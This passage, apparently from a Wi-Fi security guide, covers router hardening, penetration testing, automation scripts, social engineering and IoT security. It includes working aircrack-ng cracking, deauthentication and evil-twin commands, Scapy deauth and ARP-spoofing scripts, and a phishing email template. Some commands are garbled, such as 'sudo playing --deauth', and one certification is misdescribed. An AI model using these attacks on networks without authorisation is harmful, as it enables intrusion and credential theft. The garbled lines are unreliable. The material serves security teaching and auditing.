4. Set up a strong password for your Wi-Fi network.
5. Save the settings and restart the router if necessary.

Strong Password Setting


A strong password is the first line of defense against unauthorized access.
● Strong Password Creation:

1. Use a combination of upper and lower case letters, numbers, and special
characters.
2. Avoid using common words or personal information that can be easily
guessed.
3. The password must be at least 12 characters long.

Disabling WPS
WPS makes network configuration easier, but it is vulnerable to attacks. Disabling it is an
important security measure.
● Disabling WPS on the Router:

1. Access the router's administration interface.


2. Navigate to WPS settings.
3. Disable the WPS function.
4. Save the settings.
Guest Network Configuration
Setting up a separate guest network can protect the main network and connected devices.
● Guest Network Creation:

1. Access the router's administration interface.


2. Navigate to Guest Network Settings.
3. Enable guest networking and configure a different SSID (network name).
4. Set up a strong password for the guest network.
5. Isolate the guest network from the main network to protect devices and
personal data.

Security Scan Tools


There are several tools available to check Wi-Fi network security and identify potential
vulnerabilities. Below, we discuss some of the most effective.

Wireshark
Wireshark can be used to monitor and analyze network traffic in real time.
Installation:
bash
sudo apt install wireshark

Basic Use:
Start Wireshark with superuser privileges:
bash
sudo wireshark

Select the network interface and start packet capture.


Use filters to focus on specific types of traffic, for example:
text
http

Nmap
Nmap is used to discover devices and services on a network, as well as to identify possible
vulnerabilities.
Installation:
bash
sudo apt install nmap

Basic Use:
Perform a network scan to identify devices and services:
bash
sudo nmap -sP 192.168.1.0/24

Perform a port scan to identify vulnerable services:


bash
sudo nmap -sV 192.168.1.1

OpenVAS
OpenVAS is a vulnerability management platform that can be used to perform in-depth security
scans on networks and devices.
Installation:
bash
sudo apt install openvas

Basic Configuration:
1. Start the OpenVAS service and configure it to perform vulnerability scans on
the network.
2. Analyze generated reports to identify and fix vulnerabilities.

Nessus
Nessus is a commercial vulnerability scanning tool that offers advanced functionality to identify
and fix vulnerabilities in networks and devices.
● Download and Installation: Download Nessus from the official website and follow the
installation instructions.
● Basic Configuration:
1. Configure Nessus to perform vulnerability scans on your network.
2. Analyze generated reports to identify and fix vulnerabilities.

Ongoing Maintenance
Maintaining Wi-Fi network security requires ongoing efforts to ensure that all security measures
are up to date and effective. Below, we discuss some best practices for ongoing maintenance.

Regular Firmware Update


Keeping your router and device firmware up to date is crucial to protect against known
vulnerabilities.
● Update Procedure:

1. Regularly check your router manufacturer's website for firmware updates.


2. Download and install the latest firmware following the manufacturer's
instructions.
3. Configure the router to automatically check for updates if available.

Continuous Monitoring
Implementing continuous monitoring systems can help detect suspicious activity and quickly
respond to security incidents.
● Use of IDS/IPS: Tools like Snort or Zeek can be configured to monitor network traffic
and alert you to suspicious activity.
Snort Configuration:
bash
sudo apt install snort
● Configure specific rules to detect common attacks and malicious activity.

Periodic Review of Security Settings


Regularly reviewing the security settings of your router and connected devices is essential to
ensure that best security practices are being followed.
● Settings Review:

1. Check your router's security settings, including WPA3, passwords, and guest
networks.
2. Review access control and authentication policies.
3. Test network segmentation and VLANs to ensure proper device isolation.
Continuous User Education
Educating users about security best practices and how to identify signs of attacks is critical to
maintaining network security.
● Good Security Practices:
○ Do not click on suspicious links.
○ Check the presence of HTTPS on the websites accessed.
○ Use strong and unique passwords for each service.
○ Be wary of unknown or unsecured Wi-Fi networks.

Practical Examples of Execution and Defense


WPA3 Configuration
1. Router Configuration for WPA3:
1. Access the router's administration interface.
2. Navigate to your wireless network security settings.
3. Select WPA3 as the authentication method.
4. Set up a strong password for your Wi-Fi network.
5. Save the settings and restart the router if necessary.

Guest Network Creation


1. Guest Network Configuration:
1. Access the router's administration interface.
2. Navigate to Guest Network Settings.
3. Enable guest networking and configure a different SSID.
4. Set up a strong password for the guest network.
5. Isolate the guest network from the main network.

Continuous Monitoring with Snort


Snort Installation and Configuration:
bash
sudo apt install snort
1.
2. Rules Configuration: Configure specific rules to detect common attacks and
malicious activities.
3. Traffic Monitoring: Configure Snort to monitor network traffic and generate alerts
about suspicious activity.
Creating and maintaining secure Wi-Fi networks is an ongoing process that requires
implementing robust security measures, using advanced monitoring tools, and constantly
educating users. Best practices such as using WPA3, setting strong passwords, disabling WPS,
and network segmentation with VLANs are essential for both home and corporate networks.
Tools like Wireshark, Nmap, OpenVAS, and Nessus can help identify and fix vulnerabilities,
while ongoing maintenance ensures all security measures are up to date and effective. Following
these practices and using these tools can help protect Wi-Fi networks from threats, ensuring the
security and integrity of transmitted data.
CHAPTER 13: WI-FI AUDITING AND
PENETRATION TESTING

Wi-Fi Audit Planning


Wi-Fi network auditing and penetration testing are crucial processes for identifying and
remediating vulnerabilities before they can be exploited by malicious attackers. Planning is the
essential first step to ensuring these tests are effective and comprehensive.

Audit Objectives
Clearly defining the audit objectives is essential. Objectives may include identifying
vulnerabilities, evaluating the effectiveness of existing security measures, and complying with
regulations.
● Vulnerability Identification: Identify weaknesses in network configuration, such as
weak passwords, outdated protocols, and insecure configurations.
● Assessment of Security Measures: Evaluate the effectiveness of security policies and
protection tools implemented.
● Regulatory Compliance: Ensure the network complies with specific regulations such as
GDPR, HIPAA, and PCI-DSS.

Audit Scope
Defining the audit scope helps to focus efforts and resources effectively. The scope must include
all components of the Wi-Fi network, such as access points, client devices, security policies, and
network segmentation.
● Network Components: Identify all access points, connected devices, and IoT devices.
● Security Policies: Review authentication, encryption, and access control policies.
● Network Segmentation: Check the configuration of VLANs and guest networks.

Tools and Resources


Selecting the appropriate tools and resources is crucial to conducting an effective audit. Network
analysis, packet sniffing, and vulnerability scanning tools are essential.
● Network Analysis Tools: Wireshark, Tcpdump, Kismet.
● Vulnerability Scanning Tools: Nmap, OpenVAS, Nessus.
● Packet Sniffing Tools: Aircrack-ng, Ettercap.
Schedule and Team
Establishing a detailed schedule and assembling a team of qualified professionals are important
steps to ensuring the success of the audit.
● Timeline: Set deadlines for each stage of the audit, including planning, testing, analyzing
results and documenting.
● Team: Include network security professionals, security analysts, and system
administrators.

Executing Penetration Tests


Performing penetration testing is the practical audit step where vulnerabilities are actively
exploited to assess the security of the Wi-Fi network.

Information Collection
Gathering information is the first step in penetration testing. This involves identifying all devices
and access points on the network.
Network Scanning with Nmap:
bash
sudo nmap -sP 192.168.1.0/24
● This command identifies all devices on the network.
Identifying Access Points with Kismet:
bash
sudo kismet
● Kismet detects all access points and connected devices.

Vulnerability Testing
Performing vulnerability testing helps identify weaknesses that can be exploited.
Brute Force Password Testing with Aircrack-ng:
bash
sudo airodump wlan0mon
sudo airplay - deauth 0 - a [ BSSID ] wlan0mon
sudo aircrack-ng -w wordlist.txt -b [BSSID] capture-01.cap
● This process captures WPA/WPA2 handshakes and attempts to crack the password using
a dictionary file.
● Vulnerability Scanning with Nessus: Configure Nessus to perform a full network scan
and identify known vulnerabilities.
Simulated Attacks
Conducting simulated attacks helps evaluate the effectiveness of security measures and the
network's response to intrusion attempts.
Deauthentication Attack with Aireplay-ng:
bash
sudo aireplay-ng --deauth 0 -a [BSSID] -c [CLIENT_MAC] wlan0mon
● This attack forces devices to disconnect from the access point.
Evil Twin Attack with Airbase-ng:
bash
sudo airbase-ng -e "NomeDoSSID" wlan0mon
● This command creates a fake access point with the same SSID as the legitimate access
point.

Packet Analysis
Analyzing captured data packets helps identify suspicious traffic and additional vulnerabilities.
● Packet Analysis with Wireshark:
Start Wireshark with superuser privileges:
bash
sudo wireshark

Select the network interface and start packet capture.


Use filters to focus on specific types of traffic, for example:
text
Copy code
http

Reports and Documentation


Detailed documentation of audit and penetration test results is crucial to providing actionable
insights and guiding necessary improvements.

Report Structure
The report must be structured in a clear and understandable manner, including all findings,
analysis and recommendations.
● Executive Summary: An overview of the audit objectives, key findings and
recommendations.
● Methodology: Detailed description of the methods and tools used during auditing and
penetration testing.
● Discoveries: Detailed list of all identified vulnerabilities, classified by severity.
● Recommendations: Recommended actions to fix vulnerabilities and improve network
security.

Documentation Examples
● Discovery Example:
○ Vulnerability: Weak password on the main access point.
○ Gravity: High.
○ Description: The main access point's WPA2 password was discovered using a
brute force attack with Aircrack-ng.
○ Recommendation: Change the password to a combination of upper and lower
case letters, numbers and special characters, with a minimum of 12 characters.
● Recommendation Example:
○ Recommendation: Implement WPA3.
○ Description: WPA3 offers improved security against brute force attacks and
greater data protection. Reconfigure all access points to use WPA3.

Improvements and Corrective Actions


Based on the report's findings and recommendations, it is essential to implement improvements
and corrective actions to strengthen Wi-Fi network security.

Patch Implementation
Vulnerabilities identified during the audit must be corrected immediately.
Password Update: Update all weak or default passwords identified during testing.
text
Recommended password: Complex@Password123!

● WPA3 Configuration: Update all access points to use WPA3 as recommended in the
report.
● Patching: Ensure all devices and software are updated with the latest patches to correct
known vulnerabilities.

Continuous Monitoring
Implement continuous monitoring systems to quickly detect and respond to suspicious activity.
Snort Configuration:
bash
sudo apt install snort
● Configure Snort to monitor network traffic and alert you to suspicious activity.
● Using Zeek: Install and configure Zeek to provide detailed monitoring and logging of
network activities.

Regular Review and Update


Conduct regular audits and penetration tests to ensure security measures remain effective.
● Semiannual Audits: Plan biannual security audits to identify new vulnerabilities and
evaluate the effectiveness of implemented security measures.
● Update Security Policies: Review and update security policies regularly to reflect best
practices and respond to new threats.

Practical Examples of Execution and Defense


Information Collection with Nmap
Network Scan:
bash
sudo nmap -sP 192.168.1.0/24

Port Scan:
bash
sudo nmap -sV 192.168.1.1

Vulnerability Testing with Aircrack-ng


Handshakes Capture:
bash
sudo airodump wlan0mon
sudo airplay - deauth 0 - a [ BSSID ] wlan0mon

Password Cracking:
bash
sudo aircrack-ng -w wordlist.txt -b [BSSID] capture-01.cap

Evil Twin Attack with Airbase-ng


Fake Access Point Creation:
bash
sudo airbase-ng -e "NomeDoSSID" wlan0mon

Packet Analysis with Wireshark


Packet Capture:
bash
sudo wireshark

Traffic Analysis: Use filters to focus on specific types of traffic, for example:
text
http

Wi-Fi network auditing and penetration testing are essential processes to ensure the security of
wireless communications. Careful planning, thorough testing, accurate documentation, and
implementation of continuous improvements are critical to protecting your network from threats.
By following best practices and using the appropriate tools, it is possible to identify and correct
vulnerabilities, strengthening network security and
CHAPTER 15: USING SCRIPTS AND
AUTOMATION IN WI-FI TESTING

Introduction to Automation
Automation in Wi-Fi network testing involves the use of scripts and tools to automate repetitive
and complex tasks, making it easier to carry out audits and penetration tests. This not only
increases efficiency but also improves testing accuracy and consistency. Automation allows
security professionals to focus their efforts on analyzing and interpreting results, rather than
manually performing each step of the process.

Advantages of Automation
● Efficiency: Automating repetitive tasks saves time and allows you to perform large-scale
testing with less effort.
● Consistency: Scripts ensure that the same steps are followed every time, reducing
variability in results.
● Comprehensive Coverage: Automation allows you to perform extensive testing that
would be impractical manually.
● Proactive Detection: Continuous automation can help proactively detect vulnerabilities
before they are exploited.

Common Tools for Automation


Several tools and scripting languages can be used to automate Wi-Fi network testing:
● Python: Versatile programming language widely used for automation scripts.
● Bash: Shell script commands used to automate tasks in Linux.
● Aircrack-ng: Set of tools for Wi-Fi auditing and penetration testing.
● Scapy: Python library for handling network packets.

Development of Custom Scripts


Developing custom scripts for Wi-Fi test automation involves understanding the basic
components of the network and the tasks that need to be automated. Below, we detail how to
create effective scripts for different purposes.

Basic Structure of a Script


A basic script for Wi-Fi penetration testing typically includes the following steps:
1. Environment Setting: Definition of network interfaces and monitor mode.
2. Information Collection: Network scanning to identify access points and devices.
3. Executing Attacks: Carrying out simulated attacks to test security.
4. Results analysis: Packet capture and analysis to identify vulnerabilities.

Bash Script Example for Information


Collection
This Bash script configures the network interface in monitor mode and performs a network scan
using airodump-ng.
bash
#!/bin/bash
# Configure interface in monitor mode
sudo airmon-ng start wlan0
# Network scanning with airodump-ng
sudo airodump wlan0mon

Python Script Example with Scapy


This Python script uses the Scapy library to send deauthentication packets.
python
from scapy.all import *
def deauth_attack(target_mac, gateway_mac):
# Create a deauthentication package
pkt = RadioTap() / Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac) /
Dot11Deauth(reason=7)
# Send the packet in a loop
sendp(pkt, iface="wlan0mon", count=100, inter=0.1)
# Set destination and gateway MAC addresses
target_mac = "ff:ff:ff:ff:ff:ff"
gateway_mac = "00:11:22:33:44:55"
# Perform the deauthentication attack
deauth_attack(target_mac, gateway_mac)
Examples of Automation Scripts
Let's explore detailed examples of automation scripts for different types of Wi-Fi tests.

Script for Handshake Capture and Password


Cracking
This Bash script captures WPA/WPA2 handshakes and attempts to crack the password using a
dictionary file.
bash
#!/bin/bash
# Configure interface in monitor mode
sudo airmon-ng start wlan0
# Capture handshakes with airodump-ng
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon &
# Perform deauthentication attack to force handshake capture
sudo playing --deauth 10 -a 00:11:22:33:44:55 wlan0mon
# Try to crack the password with aircrack-ng
sudo aircrack-ng -w wordlist.txt -b 00:11:22:33:44:55 capture-01.cap

Script Python para Spoofing de ARP


This Python script performs an ARP spoofing attack to redirect network traffic.
python
from scapy.all import *
def arp_spoof(target_ip, spoof_ip):
# Create a spoofing ARP packet
pkt = ARP(op=2, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", psrc=spoof_ip)
# Send the packet in a loop
send(pkt, iface="wlan0mon", count=100, inter=2)
# Set destination IP and spoofing IP
target_ip = "192.168.1.100"
spoof_ip = "192.168.1.1"
# Perform ARP spoofing attack
arp_spoof(target_ip, spoof_ip)
Bash Script for Continuous Monitoring
This Bash script uses tcpdump to continuously monitor network traffic and save packets to a
capture file.
bash
#!/bin/bash
# Configure interface in monitor mode
sudo airmon-ng start wlan0
# Monitor network traffic with tcpdump
sudo tcpdump -i wlan0mon -w capture.pcap

Benefits and Challenges of Automation


Wi-Fi test automation offers several benefits, but it also presents challenges that need to be
considered.

Benefits of Automation
● Time Efficiency: Automating repetitive tasks saves time and allows you to perform
large-scale testing.
● Consistency: Scripts ensure that the same steps are followed every time, reducing
variability in results.
● Comprehensive Coverage: Allows you to perform extensive tests that would be
impractical manually.
● Proactive Detection: Continuous automation can help proactively detect vulnerabilities
before they are exploited.

Automation Challenges
● Script Maintenance: Keeping scripts up to date can be challenging, especially in
constantly changing environments.
● Complexity: Developing complex scripts requires advanced programming skills and in-
depth knowledge of the network.
● False Positives/Negatives: Automated scripts can generate false positives or negatives,
requiring manual analysis of the results.
● Computational Resources: Executing scripts on a large scale can require significant
computational resources.

Practical Examples of Execution and Defense


Test Automation with Aircrack-ng
Interface Configuration in Monitor Mode:
bash
sudo airmon-ng start wlan0

Handshake Capture and Password Cracking:


bash
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon &
sudo playing --deauth 10 -a 00:11:22:33:44:55 wlan0mon
sudo aircrack-ng -w wordlist.txt -b 00:11:22:33:44:55 capture-01.cap

Attack Automation with Scapy


Deauthentication Attack:
python
from scapy.all import *
def deauth_attack(target_mac, gateway_mac):
pkt = RadioTap() / Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac) /
Dot11Deauth(reason=7)
sendp(pkt, iface="wlan0mon", count=100, inter=0.1)
target_mac = "ff:ff:ff:ff:ff:ff"
gateway_mac = "00:11:22:33:44:55"
deauth_attack(target_mac, gateway_mac)

Continuous Monitoring with Tcpdump


Traffic Monitoring:
bash
sudo airmon-ng start wlan0
sudo tcpdump -i wlan0mon -w capture.pcap

Automation in Wi-Fi network testing is a powerful practice that increases test efficiency,
consistency and coverage. Developing custom scripts using tools like Aircrack-ng, Scapy and
Tcpdump allows you to automate complex and repetitive tasks, freeing up time for analysis and
interpretation of results. Despite challenges such as script maintenance and development
complexity, the benefits outweigh the difficulties, making automation an essential part of Wi-Fi
network security. Implementing automation practices helps proactively identify and remediate
vulnerabilities, ensuring the security and integrity of wireless communications.
CHAPTER 16: SOCIAL ENGINEERING
TECHNIQUES IN WI-FI ATTACKS

Understanding Social Engineering


Social engineering is the psychological manipulation of people into performing actions or
disclosing confidential information. In Wi-Fi attacks, social engineering techniques are used to
trick individuals into gaining access to wireless networks or obtaining information that facilitates
other types of attacks. These attacks are effective because they exploit users' trust, curiosity, or
ignorance.

Definition of Social Engineering


Social engineering involves exploiting human weaknesses rather than technological flaws. It can
be carried out through direct interaction, such as phone calls and emails, or indirectly, such as
phishing and the use of pretextual scenarios.
● Phishing: Sending emails or messages that appear to be from a trusted source to trick
victims into disclosing confidential information.
● Pretexting: Create a false scenario to obtain confidential information from a victim.
● Baiting: Offering something attractive to trick victims into disclosing information or
installing malware.
● Tailgating: Follow an authorized person to enter restricted areas.

Methods and Tools


There are several techniques and tools that can be used in social engineering for Wi-Fi attacks.
Below we explore some of the most common methods.

Phishing
Phishing is a social engineering technique that involves sending fraudulent messages that appear
to be from a trusted source, with the aim of tricking victims into divulging confidential
information.
● Email Phishing: Create an email that appears to be from a trusted source, such as a
network administrator or internet service provider, asking the victim to provide their Wi-
Fi credentials.
Email Phishing Example:
text
Subject: Network Security Check
Dear User,
We are performing a security check on our network. Please confirm your Wi-Fi credentials by
clicking the link below:
[Malicious Link]
Yours sincerely,
Technical Support Team

Pretexting
Pretexting involves creating a false scenario to obtain confidential information from a victim.
This can be done by phone, email or in person.
● Example of Pretexting: An attacker could pose as a support technician from an internet
company and call the victim, requesting information about Wi-Fi network configuration
to "resolve a technical issue."

Baiting
Baiting involves offering something attractive to trick victims into disclosing information or
installing malware. This may include offering free access to a Wi-Fi network in exchange for
personal information.
● Baiting Example: Setting up a fake Wi-Fi hotspot in a public place with an attractive
SSID such as "Free Wi-Fi" and asking users to register with their email credentials.

Tailgating
Tailgating is the practice of following an authorized person to enter restricted areas, without
having the appropriate authorization. In Wi-Fi contexts, this may involve gaining physical access
to a secure location to obtain information about the network.
● Example of Tailgating: Follow a company employee into IT and take the opportunity to
gain access to network or device information.

Real Cases of Social Engineering


Studying real cases of social engineering attacks helps you understand how these techniques are
applied in practice and learn from the security flaws that have been exploited.
Case 1: Phishing in a Technology Company
Context: A large technology company was the target of a phishing attack where attackers sent
fake emails that appeared to be from an internet service provider. The emails asked employees to
confirm their Wi-Fi credentials.
Attack Execution:
● The emails contained a link to a fake login page that captured employees' credentials.
● The attackers used these credentials to access the company's Wi-Fi network.
Consequences:
● Unauthorized access to the company's internal network.
● Theft of confidential information and corporate data.
Lessons Learned:
● Implement phishing awareness training for employees.
● Use two-factor authentication (2FA) for Wi-Fi network access.

Case 2: Pretexting in a Bank


Context: A bank was the target of a pretexting attack where the attacker posed as an IT support
technician and called several employees, requesting information about Wi-Fi network
configuration.
Attack Execution:
● The attacker collected detailed information about the network configuration, including
SSIDs, passwords, and IP addresses.
● Used this information to gain unauthorized access to the bank's Wi-Fi network.
Consequences:
● Compromising the security of the bank's network.
● Access to financial data and customer information.
Lessons Learned:
● Verify the identity of anyone requesting confidential information.
● Implement strict information access control policies.

Case 3: Baiting in a Café


Context: An attacker has set up a fake Wi-Fi hotspot at a popular cafe, with a catchy SSID like
"Free Wi-Fi." Users who logged in were asked to register with their email credentials.
Attack Execution:
● Users who registered provided their email credentials, which were captured by the
attacker.
● The attacker used these credentials to access email accounts and carry out malicious
activities.
Consequences:
● Compromise of users' email accounts.
● Potential identity theft and access to personal information.
Lessons Learned:
● Avoid connecting to unknown or unsecured Wi-Fi networks.
● Use VPNs to secure network traffic when using public Wi-Fi.

Defense Against Social Engineering


Protecting yourself against social engineering attacks involves a combination of training, security
policies, and technology tools. Below, we discuss effective strategies to mitigate these attacks.

Awareness Training
Educating users about the risks of social engineering and how to recognize attempted attacks is
critical to defense.
● Training Programs: Implement regular training programs that teach employees how to
identify and respond to social engineering attempts.
● Phishing Simulations: Conduct phishing simulations to test employee readiness and
reinforce training.

Security Policies
Establishing strict security policies helps prevent confidential information from being disclosed.
● Identity Verification: Implement procedures to verify the identity of anyone who
requests sensitive information, such as network passwords or Wi-Fi settings.
● Two-Factor Authentication (2FA): Use 2FA for all Wi-Fi network access accounts and
other critical systems.

Technological Tools
Using technological tools to monitor and protect the network against social engineering attempts
is an effective defense.
● Email Filters: Implement advanced email filters to detect and block phishing attempts.
● Intrusion Detection Systems (IDS): Use IDS to monitor network traffic and identify
suspicious activity that could indicate a social engineering attack.

Practical Examples of Execution and Defense


Phishing Awareness Training
1. Training Programs:

○ Develop training modules that teach employees how to recognize phishing emails
and other social engineering attempts.
○ Conduct regular and mandatory training sessions for all employees.

2. Phishing Simulations:

○ Send simulated phishing emails to employees to test their readiness.


○ Evaluate results and provide feedback to reinforce training.

Implementation of Identity Verification


Policies
1. Verification Procedures:

○ Establish procedures to verify the identity of anyone requesting confidential


information.
○ Require multiple verification factors, such as passwords and security questions.

2. Access Control Policy:

○ Define and implement role-based access control policies, limiting access to


confidential information to authorized employees only.

Use of Technological Tools for Defense


1. Email Filters:

○ Implement advanced email filters that use behavior analysis and machine learning
to detect and block phishing attempts.

2. Intrusion Detection Systems (IDS):

○ Configure IDS to monitor network traffic and generate alerts about suspicious
activity.
○ Use tools like Snort or Zeek for ongoing traffic analysis.

Social engineering techniques pose a significant threat to the security of Wi-Fi networks,
exploiting human weaknesses rather than technological flaws. Methods such as phishing,
pretexting, baiting and tailgating are used to deceive individuals and gain access to confidential
information. Defending against these attacks involves a combination of awareness training, strict
security policies, and the use of advanced technological tools. Implementing these strategies
helps mitigate the risks associated with social engineering and protect the integrity and
confidentiality of wireless communications.
CHAPTER 17: IOT AND WI-FI SECURITY

IoT Security Challenges


The Internet of Things (IoT) connects a wide range of devices to the internet, allowing them to
collect and share data. These devices include everything from thermostats and security cameras
to connected cars and industrial equipment. While IoT offers numerous advantages, it also
introduces a number of security challenges, especially when connected to Wi-Fi networks.

Complexity and Diversity


The diversity of IoT devices, each with different processing capabilities, operating systems and
security requirements, makes managing and protecting these networks complex.
● Heterogeneous Devices: They range from simple sensors to complex control systems.
● Different Operating Systems: They can run proprietary systems, modified versions of
Linux or other systems.
● Varying Security Requirements: Some devices may not support advanced encryption or
frequent security updates.

Hardware Limitations
Many IoT devices have limited hardware resources, which can restrict the implementation of
robust security measures.
● Processing Capacity: Low-power processors may not support strong encryption.
● Limited Storage: Reduced storage space may prevent security patches from installing.
● Restricted Energy: Battery-powered devices may have power limitations that restrict
security-intensive processes from running.

Lack of Standardization
The lack of standardization in communication and security protocols between IoT devices further
complicates the protection of these networks.
● Proprietary Protocols: Many devices use proprietary communication protocols.
● Interoperability: Ensuring that devices from different manufacturers work together
securely is a challenge.

Common Vulnerabilities
IoT devices are often subject to various vulnerabilities that can be exploited by attackers to
compromise Wi-Fi network security.

Default Passwords
Many IoT devices come with factory default passwords that are not changed by users, making
unauthorized access easier.
Example of Default Passwords:
text
admin/admin
user/user

Lack of Encryption
Some IoT devices transmit data unencrypted or use weak encryption, exposing them to
interception and manipulation.
Example of Unencrypted Traffic:
text
GET /data HTTP/1.1
Host: device.local

Infrequent Firmware Updates


Many IoT devices do not receive regular firmware updates, leaving known vulnerabilities
unpatched.
● Common Problems:
○ Outdated Firmware: Devices with outdated firmware are easy targets.
○ Lack of Support: Some manufacturers do not provide ongoing support for
security updates.

Exhibition of Doors and Services


IoT devices often have unnecessary ports and services open, which can be exploited by attackers.
Example of Open Doors:
text
Port 23 (Telnet)
Porta 80 (HTTP)

IoT Testing Tools


Testing the security of IoT devices requires the use of specialized tools that can identify and
exploit vulnerabilities specific to these devices.

Nmap
Nmap is a tool that can be used to identify connected IoT devices and check open ports and
services.
Installation:
bash
sudo apt install nmap

Basic Use:
bash
sudo nmap -sP 192.168.1.0/24
This command identifies all devices connected to the network.
Port Scan:
bash
sudo nmap -sV 192.168.1.100
This command checks open ports and services on a specific device.

Wireshark
Wireshark is a tool that can be used to capture and analyze network traffic from IoT devices.
Installation:
bash
sudo apt install wireshark

Basic Use:
Start Wireshark with superuser privileges:
bash
sudo wireshark

Select the network interface and start packet capture.


Use filters to focus on specific types of traffic, for example:
text
ip.addr == 192.168.1.100

Shodan
Shodan is a search engine for internet-connected devices that can be used to identify vulnerable
IoT devices.
● Access to Shodan: Access Shodan via browser at shodan.io.
● Basic Search:
Search for specific devices, like security cameras or thermostats:
text
camera country:"US"

IoT Inspector
IoT Inspector is a security analysis tool that can be used to check vulnerabilities in IoT devices.
● Installation: Download and install IoT Inspector from the official website.
● Basic Use:
○ Connect the IoT device to IoT Inspector.
○ Launch a scan to identify vulnerabilities and insecure configurations.

Securing IoT Devices


Securing IoT devices requires implementing several security practices to mitigate risks and
secure the Wi-Fi network.

Changing Default Passwords


Changing default passwords to strong, unique passwords is one of the most important measures
to secure IoT devices.
Strong Password Example:
text
Complex@Password123!

Use of Cryptography
Ensuring that all data transmitted by IoT devices is encrypted helps protect against interception
and manipulation.
● HTTPS Configuration: Ensure IoT devices use HTTPS for secure communications.
● Use of VPNs: Implement VPNs for IoT devices that transmit sensitive data.

Regular Firmware Updates


Keeping the firmware of IoT devices up to date is crucial to patching known vulnerabilities.
● Update Procedure:

1. Regularly check the manufacturer's website for firmware updates.


2. Download and install the latest firmware following the manufacturer's
instructions.
3. Configure devices to automatically check for updates if available.

IoT Device Isolation


Isolating IoT devices on a separate network helps protect the main network and other devices.
● VLAN configuration: Configure VLANs on the router and switches to isolate IoT
devices from critical devices and the main network.
● Guest Networks: Use guest networks for IoT devices that do not need to communicate
with the main network.

Continuous Monitoring
Implementing continuous monitoring systems can help detect suspicious activity and quickly
respond to security incidents.
● Use of IDS/IPS: Tools like Snort or Zeek can be configured to monitor IoT device traffic
and alert on suspicious activity.
Snort Configuration:
bash
sudo apt install snort
● Configure Snort to monitor IoT device traffic and generate alerts about anomalous
activity.

Practical Examples of Execution and Defense


Changing Default Passwords
1. Login no IoT Device:

○ Access the IoT device administration interface via browser.


○ Use default credentials to log in.

2. Change password:

○ Navigate to security settings.


○ Change the default password to a strong, unique password.
○ Save the settings and log out.

Encryption Configuration
1. HTTPS Configuration:

○ Access the IoT device administration interface.


○ Navigate to Network or Security settings.
○ Enable HTTPS for secure communications.
○ Install an SSL/TLS certificate if necessary.

2. Using VPN:

○ Configure a VPN server on your network.


○ Configure the IoT device to connect to the VPN server.
○ Verify that all IoT device traffic is encrypted by the VPN.

Firmware Update
1. Checking for Updates:

○ Go to the IoT device manufacturer's website.


○ Check the support section for firmware updates.

2. Installing Updates:

○ Download the latest firmware update.


○ Access the IoT device administration interface.
○ Navigate to Firmware Update Settings.
○ Upload and install the update file.

IoT Device Isolation


1. VLAN configuration:

○ Access the administration interface of the router or switch.


○ Create a separate VLAN for IoT devices.
○ Configure IoT devices to connect to the VLAN.

2. Configuring Guest Networks:

○ Access the router's administration interface.


○ Create a separate guest network.
○ Connect IoT devices to the guest network.

Continuous Monitoring with Snort


Snort Installation and Configuration:
bash
sudo apt install snort

Rules Configuration:
○ Configure specific rules to monitor IoT device traffic and detect suspicious
activity.
Traffic Monitoring:
○ Configure Snort to monitor IoT device traffic and generate alerts about anomalous
activity.

IoT devices offer numerous advantages, but they also introduce significant security challenges,
especially when connected to Wi-Fi networks. The diversity and complexity of these devices,
combined with their hardware limitations and lack of standardization, create a vulnerable
environment. Implementing robust security practices, such as changing default passwords, using
encryption, regular firmware updates, device isolation, and continuous monitoring, is essential to
protecting these devices and the Wi-Fi network. Using specialized testing tools, such as Nmap,
Wireshark, Shodan and IoT Inspector, helps identify and fix vulnerabilities, ensuring the security
and integrity of wireless communications in IoT environments.
CHAPTER 18: WI-FI SECURITY SKILLS
DEVELOPMENT

Recommended Certifications and Training


Developing skills in Wi-Fi security is essential for professionals who want to specialize in this
area. There are several certifications and trainings that can help you acquire in-depth knowledge
and practical skills.

Relevant Certifications
● Certified Wireless Network Administrator (CWNA):
○ Description: The CWNA certification provides a solid foundation in wireless
networking technologies and security concepts.
○ Content: Coverage of topics such as RF fundamentals, Wi-Fi standards, wireless
network configuration, and Wi-Fi security.
○ Prerequisites: None, although networking experience is recommended.
○ Exam: Consists of 60 multiple-choice questions lasting 90 minutes.
○ Study Resources: Official CWNA books, online courses, hands-on labs.
● Certified Wireless Security Professional (CWSP):
○ Description: The CWSP certification focuses on advanced aspects of wireless
network security.
○ Content: Includes topics such as authentication and encryption security, attacks
and mitigation, security policies and monitoring.
○ Prerequisites: CWNA Certification.
○ Exam: Consists of 60 multiple-choice questions lasting 90 minutes.
○ Study Resources: Official CWSP books, online courses, hands-on labs.
● Certified Ethical Hacker (CEH):
○ Description: The CEH certification provides an overview of ethical hacking
techniques, including wireless network security.
○ Content: Covers topics such as attack and defense techniques, hacking tools,
vulnerability analysis, and wireless network security.
○ Prerequisites: Two years of information security experience or complete an
official CEH training course.
○ Exam: Consists of 125 multiple choice questions lasting 4 hours.
○ Study Resources: Official CEH books, online courses, practical laboratories.
● GIAC Wireless Security Professional (GWAPT):
○ Description: The GWAPT certification focuses on penetration testing techniques
for wireless networks.
○ Content: Includes topics such as Wi-Fi network security assessment, encryption
attacks, vulnerability exploration, and penetration testing tools.
○ Prerequisites: None, although security experience is recommended.
○ Exam: Consists of 75 multiple choice questions lasting 2 hours.
○ Study Resources: Official GWAPT books, online courses, hands-on labs.

Practical Trainings
In addition to certifications, participating in hands-on training is essential to acquire applicable
Wi-Fi security skills.
● Online courses:
○ Udemy: Offers courses on Wi-Fi security, penetration testing, and ethical hacking
with experienced instructors.
○ Coursera: Partnerships with leading universities and companies to offer courses
on wireless security and cybersecurity.
○ Pluralsight: Focus on advanced technical training in information security and
wireless networks.
● Workshops e Bootcamps:
○ SANS Institute: Offers intensive workshops and bootcamps focused on wireless
security and penetration testing.
○ Offensive Security: Known for the Offensive Security Wireless Professional
(OSWP) course and certification, which offers hands-on training in Wi-Fi
hacking.

Laboratories and Practice Environments


Creating laboratories and practice environments is essential for applying theoretical knowledge
and developing practical skills in Wi-Fi security.

Home Lab Setup


Setting up a Wi-Fi security lab at home allows you to experiment with attack and defense
techniques in a controlled environment.
● Necessary equipments:
○ Wi-Fi routers: Multiple routers to simulate different network scenarios.
○ Wi-Fi adapters: Adapters that support monitor mode and packet injection.
